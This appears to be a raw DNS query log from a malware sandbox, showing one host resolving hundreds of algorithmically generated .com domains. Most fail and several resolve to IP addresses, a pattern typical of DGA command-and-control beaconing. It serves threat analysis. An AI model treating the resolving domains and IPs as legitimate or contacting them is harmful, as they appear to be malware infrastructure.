Aug 23, 2024 18:47:39.984188080 CEST	1.1.1.1	192.168.2.4	0x8edd	Name error (3)	pufyxug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984208107 CEST	1.1.1.1	192.168.2.4	0xc5d2	Name error (3)	pupylaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984220028 CEST	1.1.1.1	192.168.2.4	0xeb76	Name error (3)	vonymuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984229088 CEST	1.1.1.1	192.168.2.4	0x252	Name error (3)	gadypuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984240055 CEST	1.1.1.1	192.168.2.4	0x1d50	Name error (3)	vopykak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984247923 CEST	1.1.1.1	192.168.2.4	0x468d	Name error (3)	gatykow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984257936 CEST	1.1.1.1	192.168.2.4	0x3cda	Name error (3)	qebyhuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984266996 CEST	1.1.1.1	192.168.2.4	0xf3e6	Name error (3)	lykysix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984280109 CEST	1.1.1.1	192.168.2.4	0xbcbc	Name error (3)	lyvynen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984288931 CEST	1.1.1.1	192.168.2.4	0xb980	Name error (3)	qetyrap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984298944 CEST	1.1.1.1	192.168.2.4	0x2b08	Name error (3)	qetykol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984308004 CEST	1.1.1.1	192.168.2.4	0x99da	Name error (3)	qegytyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.988687038 CEST	1.1.1.1	192.168.2.4	0xd691	Name error (3)	puvybeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.990586042 CEST	1.1.1.1	192.168.2.4	0x699	Name error (3)	puryjil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.990598917 CEST	1.1.1.1	192.168.2.4	0x667f	Name error (3)	volybec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.996793032 CEST	1.1.1.1	192.168.2.4	0x994b	Name error (3)	lykyvod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.997307062 CEST	1.1.1.1	192.168.2.4	0xb9f4	Name error (3)	qekyvav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.997318029 CEST	1.1.1.1	192.168.2.4	0x2577	Name error (3)	pujycov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.000474930 CEST	1.1.1.1	192.168.2.4	0xd7f5	Name error (3)	vopyret.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.008990049 CEST	1.1.1.1	192.168.2.4	0xd5a6	Name error (3)	lymymud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.009103060 CEST	1.1.1.1	192.168.2.4	0x16fb	Name error (3)	vofyzym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.009114027 CEST	1.1.1.1	192.168.2.4	0x554a	Name error (3)	qedyleq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012413979 CEST	1.1.1.1	192.168.2.4	0xdc6a	Name error (3)	lygyxun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012427092 CEST	1.1.1.1	192.168.2.4	0x3794	Name error (3)	lysylej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012438059 CEST	1.1.1.1	192.168.2.4	0xc09	Name error (3)	pumymuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012447119 CEST	1.1.1.1	192.168.2.4	0x77e5	Name error (3)	gahycib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012458086 CEST	1.1.1.1	192.168.2.4	0x34df	Name error (3)	ganynyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012765884 CEST	1.1.1.1	192.168.2.4	0xbdcd	Name error (3)	vojypuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012778044 CEST	1.1.1.1	192.168.2.4	0xd4c6	Name error (3)	qebynyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012787104 CEST	1.1.1.1	192.168.2.4	0xcf74	Name error (3)	gacyvah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012797117 CEST	1.1.1.1	192.168.2.4	0x4759	Name error (3)	pujypup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012806892 CEST	1.1.1.1	192.168.2.4	0x663	Name error (3)	lyryjir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.012816906 CEST	1.1.1.1	192.168.2.4	0x2410	Name error (3)	vocybam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.015851021 CEST	1.1.1.1	192.168.2.4	0xffad	Name error (3)	lyrywax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.015866041 CEST	1.1.1.1	192.168.2.4	0x3d9f	Name error (3)	vonyjim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.015876055 CEST	1.1.1.1	192.168.2.4	0xb196	Name error (3)	qexyfel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.015886068 CEST	1.1.1.1	192.168.2.4	0xcb57	Name error (3)	gaqyqis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.019756079 CEST	1.1.1.1	192.168.2.4	0x8677	Name error (3)	gahypus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.127703905 CEST	1.1.1.1	192.168.2.4	0x41cc	Name error (3)	vojycif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.148049116 CEST	1.1.1.1	192.168.2.4	0xa583	Name error (3)	volydot.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.198335886 CEST	1.1.1.1	192.168.2.4	0x999b	Name error (3)	lygytyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.205653906 CEST	1.1.1.1	192.168.2.4	0x7ee	Name error (3)	pufytev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.207686901 CEST	1.1.1.1	192.168.2.4	0x965e	Name error (3)	gaqyhuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.211221933 CEST	1.1.1.1	192.168.2.4	0xb850	Name error (3)	vofyref.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.211572886 CEST	1.1.1.1	192.168.2.4	0x6586	Name error (3)	puzyciq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.213248968 CEST	1.1.1.1	192.168.2.4	0xbd36	Name error (3)	volycik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.213262081 CEST	1.1.1.1	192.168.2.4	0xcc10	Name error (3)	lymygyx.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.214278936 CEST	1.1.1.1	192.168.2.4	0xb300	Name error (3)	qedyrag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.214289904 CEST	1.1.1.1	192.168.2.4	0x88c	Name error (3)	gadyrab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.215959072 CEST	1.1.1.1	192.168.2.4	0x435	Name error (3)	lysywon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.215970993 CEST	1.1.1.1	192.168.2.4	0x36e	Name error (3)	qekyxul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.216721058 CEST	1.1.1.1	192.168.2.4	0xc773	Name error (3)	pupywog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.216733932 CEST	1.1.1.1	192.168.2.4	0x6f7	Name error (3)	vonygec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.216744900 CEST	1.1.1.1	192.168.2.4	0xd6de	Name error (3)	ganyfes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.216757059 CEST	1.1.1.1	192.168.2.4	0xff3a	Name error (3)	pujyxyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.218732119 CEST	1.1.1.1	192.168.2.4	0x8aad	Name error (3)	lykyxur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.218744040 CEST	1.1.1.1	192.168.2.4	0xe955	Name error (3)	gatyqih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219010115 CEST	1.1.1.1	192.168.2.4	0xe56b	Name error (3)	galycuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219027996 CEST	1.1.1.1	192.168.2.4	0x88e3	Name error (3)	puvydov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219038963 CEST	1.1.1.1	192.168.2.4	0xd8cb	Name error (3)	qebyfav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219630003 CEST	1.1.1.1	192.168.2.4	0xae74	Name error (3)	qetyquq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219641924 CEST	1.1.1.1	192.168.2.4	0x677a	Name error (3)	vocydof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219654083 CEST	1.1.1.1	192.168.2.4	0x37f5	Name error (3)	vopyqim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219664097 CEST	1.1.1.1	192.168.2.4	0x656	Name error (3)	qexyvoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219674110 CEST	1.1.1.1	192.168.2.4	0x483d	Name error (3)	qegylep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219695091 CEST	1.1.1.1	192.168.2.4	0x8043	Name error (3)	purymuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219706059 CEST	1.1.1.1	192.168.2.4	0xc10a	Name error (3)	qexysig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219727993 CEST	1.1.1.1	192.168.2.4	0x57a1	Name error (3)	lyxysun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219755888 CEST	1.1.1.1	192.168.2.4	0x561f	Name error (3)	vowymyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219765902 CEST	1.1.1.1	192.168.2.4	0x4ac1	Name error (3)	vofykoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219775915 CEST	1.1.1.1	192.168.2.4	0x440e	Name error (3)	puzypug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219784975 CEST	1.1.1.1	192.168.2.4	0xa07e	Name error (3)	gadykos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219794989 CEST	1.1.1.1	192.168.2.4	0xa9fb	Name error (3)	galypyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.219805002 CEST	1.1.1.1	192.168.2.4	0xe6d3	Name error (3)	pufylap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.220038891 CEST	1.1.1.1	192.168.2.4	0x22b3	Name error (3)	lysyjid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.220048904 CEST	1.1.1.1	192.168.2.4	0x2d12	Name error (3)	pupyjuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.220057964 CEST	1.1.1.1	192.168.2.4	0x930f	Name error (3)	lykytej.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.220069885 CEST	1.1.1.1	192.168.2.4	0xf6a2	Name error (3)	lyvyvix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.222500086 CEST	1.1.1.1	192.168.2.4	0x8414	Name error (3)	puvycip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.227302074 CEST	1.1.1.1	192.168.2.4	0x4758	Name error (3)	qebyvop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.227452993 CEST	1.1.1.1	192.168.2.4	0x3b1f	Name error (3)	lyxyvoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.227464914 CEST	1.1.1.1	192.168.2.4	0x98bd	Name error (3)	qeqyhup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.229192972 CEST	1.1.1.1	192.168.2.4	0x508e	Name error (3)	vopyjuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.234596968 CEST	1.1.1.1	192.168.2.4	0x2483	Name error (3)	pumygyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.239334106 CEST	1.1.1.1	192.168.2.4	0x3adf	Name error (3)	vojyzyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.240672112 CEST	1.1.1.1	192.168.2.4	0xaacb	Name error (3)	lyvyfad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.240711927 CEST	1.1.1.1	192.168.2.4	0xbf42	Name error (3)	gacydib.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.240721941 CEST	1.1.1.1	192.168.2.4	0x7608	Name error (3)	gahyzez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.241166115 CEST	1.1.1.1	192.168.2.4	0x4ed6	Name error (3)	gaqynyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.244344950 CEST	1.1.1.1	192.168.2.4	0x98cd	Name error (3)	qeqynel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.246208906 CEST	1.1.1.1	192.168.2.4	0x3343	Name error (3)	qedykiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.246376038 CEST	1.1.1.1	192.168.2.4	0xdef9	Name error (3)	volypum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.246387005 CEST	1.1.1.1	192.168.2.4	0xaf16	Name error (3)	pumybal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.247714996 CEST	1.1.1.1	192.168.2.4	0x146b	Name error (3)	lyrymuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.247726917 CEST	1.1.1.1	192.168.2.4	0xfd40	Name error (3)	pujyteq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.250020027 CEST	1.1.1.1	192.168.2.4	0x3bc3	Name error (3)	vojyrak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.251782894 CEST	1.1.1.1	192.168.2.4	0xa831	Name error (3)	vonybat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.252662897 CEST	1.1.1.1	192.168.2.4	0xbc06	Name error (3)	qekytyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.262087107 CEST	1.1.1.1	192.168.2.4	0xb8b1	No error (0)	qetyhyg.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.339771986 CEST	1.1.1.1	192.168.2.4	0x342a	Name error (3)	vowyjut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.374522924 CEST	1.1.1.1	192.168.2.4	0xd1a1	Name error (3)	lygylax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.559891939 CEST	1.1.1.1	192.168.2.4	0xf283	No error (0)	gatyhub.com	pltraffic7.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:47:40.559891939 CEST	1.1.1.1	192.168.2.4	0xf283	No error (0)	pltraffic7.com		72.52.179.174	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.763443947 CEST	1.1.1.1	192.168.2.4	0x7133	No error (0)	qetyhyg.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:40.987793922 CEST	1.1.1.1	192.168.2.4	0xc819	No error (0)	gatyhub.com	pltraffic7.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:47:40.987793922 CEST	1.1.1.1	192.168.2.4	0xc819	No error (0)	pltraffic7.com		72.52.179.174	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.772279978 CEST	1.1.1.1	192.168.2.4	0x49e	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.773243904 CEST	1.1.1.1	192.168.2.4	0xb943	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.773243904 CEST	1.1.1.1	192.168.2.4	0xb943	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.773582935 CEST	1.1.1.1	192.168.2.4	0x5d45	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.773593903 CEST	1.1.1.1	192.168.2.4	0x412	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.775166035 CEST	1.1.1.1	192.168.2.4	0x28e	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.775177002 CEST	1.1.1.1	192.168.2.4	0x7016	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.775186062 CEST	1.1.1.1	192.168.2.4	0x499b	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.775197029 CEST	1.1.1.1	192.168.2.4	0x7c08	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.775207043 CEST	1.1.1.1	192.168.2.4	0x41ae	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.775216103 CEST	1.1.1.1	192.168.2.4	0xfe05	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.775226116 CEST	1.1.1.1	192.168.2.4	0xbcf6	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.777013063 CEST	1.1.1.1	192.168.2.4	0xe224	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.777024031 CEST	1.1.1.1	192.168.2.4	0x9a93	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.777034044 CEST	1.1.1.1	192.168.2.4	0x3ff2	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.777045012 CEST	1.1.1.1	192.168.2.4	0xd37c	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.777055979 CEST	1.1.1.1	192.168.2.4	0x3687	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.777065039 CEST	1.1.1.1	192.168.2.4	0xe683	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.778769970 CEST	1.1.1.1	192.168.2.4	0x80d7	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.778784037 CEST	1.1.1.1	192.168.2.4	0xa935	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.778794050 CEST	1.1.1.1	192.168.2.4	0x7cad	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.778959036 CEST	1.1.1.1	192.168.2.4	0xa227	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.778969049 CEST	1.1.1.1	192.168.2.4	0xd4b1	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.778978109 CEST	1.1.1.1	192.168.2.4	0xbe70	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.778987885 CEST	1.1.1.1	192.168.2.4	0x686e	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.778997898 CEST	1.1.1.1	192.168.2.4	0x97cc	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779007912 CEST	1.1.1.1	192.168.2.4	0xa503	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779017925 CEST	1.1.1.1	192.168.2.4	0x4cad	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779028893 CEST	1.1.1.1	192.168.2.4	0x9302	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779037952 CEST	1.1.1.1	192.168.2.4	0x997c	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779048920 CEST	1.1.1.1	192.168.2.4	0x605d	No error (0)	lysyfyj.com		69.162.80.54	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779059887 CEST	1.1.1.1	192.168.2.4	0xd595	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779073954 CEST	1.1.1.1	192.168.2.4	0x7d0f	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779889107 CEST	1.1.1.1	192.168.2.4	0xffc5	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779889107 CEST	1.1.1.1	192.168.2.4	0xffc5	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779901028 CEST	1.1.1.1	192.168.2.4	0x2636	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.779910088 CEST	1.1.1.1	192.168.2.4	0xa9e3	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.781064987 CEST	1.1.1.1	192.168.2.4	0x1a1d	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.781075001 CEST	1.1.1.1	192.168.2.4	0x51c2	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.781085014 CEST	1.1.1.1	192.168.2.4	0x1b2f	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.781393051 CEST	1.1.1.1	192.168.2.4	0x8205	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.781409979 CEST	1.1.1.1	192.168.2.4	0xc3b9	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.782114983 CEST	1.1.1.1	192.168.2.4	0x1952	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.782125950 CEST	1.1.1.1	192.168.2.4	0x6385	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.782135963 CEST	1.1.1.1	192.168.2.4	0x39f5	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.782145977 CEST	1.1.1.1	192.168.2.4	0xf19d	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.786885977 CEST	1.1.1.1	192.168.2.4	0x338e	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.788320065 CEST	1.1.1.1	192.168.2.4	0x2ecc	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.789491892 CEST	1.1.1.1	192.168.2.4	0x73af	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.793085098 CEST	1.1.1.1	192.168.2.4	0xfa36	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.793251038 CEST	1.1.1.1	192.168.2.4	0x67d2	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.793262959 CEST	1.1.1.1	192.168.2.4	0x5c42	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.794291019 CEST	1.1.1.1	192.168.2.4	0x1c06	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.795720100 CEST	1.1.1.1	192.168.2.4	0xa09b	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.797342062 CEST	1.1.1.1	192.168.2.4	0xd3c8	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.798630953 CEST	1.1.1.1	192.168.2.4	0x1931	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.798644066 CEST	1.1.1.1	192.168.2.4	0xf93c	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.802999020 CEST	1.1.1.1	192.168.2.4	0x68d9	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.908907890 CEST	1.1.1.1	192.168.2.4	0xe957	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.908921957 CEST	1.1.1.1	192.168.2.4	0x1181	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.908932924 CEST	1.1.1.1	192.168.2.4	0xab39	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.908932924 CEST	1.1.1.1	192.168.2.4	0xab39	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.911410093 CEST	1.1.1.1	192.168.2.4	0x58af	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.911423922 CEST	1.1.1.1	192.168.2.4	0x9f14	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.911433935 CEST	1.1.1.1	192.168.2.4	0xb4e1	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.913059950 CEST	1.1.1.1	192.168.2.4	0x7126	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.913070917 CEST	1.1.1.1	192.168.2.4	0x8d54	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.913079977 CEST	1.1.1.1	192.168.2.4	0x5cdd	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.913408041 CEST	1.1.1.1	192.168.2.4	0xa2d8	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.913417101 CEST	1.1.1.1	192.168.2.4	0x9dd	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.913427114 CEST	1.1.1.1	192.168.2.4	0x2791	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.913439989 CEST	1.1.1.1	192.168.2.4	0xc012	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.915827036 CEST	1.1.1.1	192.168.2.4	0x1fcb	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.915838003 CEST	1.1.1.1	192.168.2.4	0xba96	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.916008949 CEST	1.1.1.1	192.168.2.4	0x1560	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
